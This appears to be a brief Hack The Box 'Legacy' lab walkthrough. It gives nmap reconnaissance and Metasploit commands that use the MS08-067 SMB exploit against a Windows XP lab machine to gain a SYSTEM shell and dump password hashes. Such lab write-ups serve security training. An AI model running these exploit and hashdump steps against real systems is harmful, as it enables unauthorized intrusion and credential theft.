Legacy
sudo msfconsole search smb_version use auxiliary/scanner/smb/smb_version options set rhosts 10.10.10.4 exploituse exploit/windows/smb/ms08_067_netapi set rhosts 10.10.10.4 run getuid sysinfo help hashdump shell
Last updated
HTB - 1. Legacy
nmap -A -T4 -p- 10.10.10.4 shows 139 and 445 open, running Windows XP, computer name LEGACY, message_signing disabled.
smbclient -L \\10.10.10.4\\ no connection
Metasplot
sudo msfconsole
search smb_version
use auxiliary/scanner/smb/smb_version
options
set rhosts 10.10.10.4
exploitResult: running Windows XP SP3
Search smb windows xp sp3 exploit found https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
Metasplot Exploit
use exploit/windows/smb/ms08_067_netapi
set rhosts 10.10.10.4
run
getuid
sysinfo
help
hashdump
shellResult: shell spawned at NT AUTHORITY\SYTEM (root equivalent) hashdump gives password hashes Admin Flag at C:\Documents and Settings\Administrator\Desktop\root.txt User Flag at C:\Documents and Settings\john\Desktop\user.txt
Last updated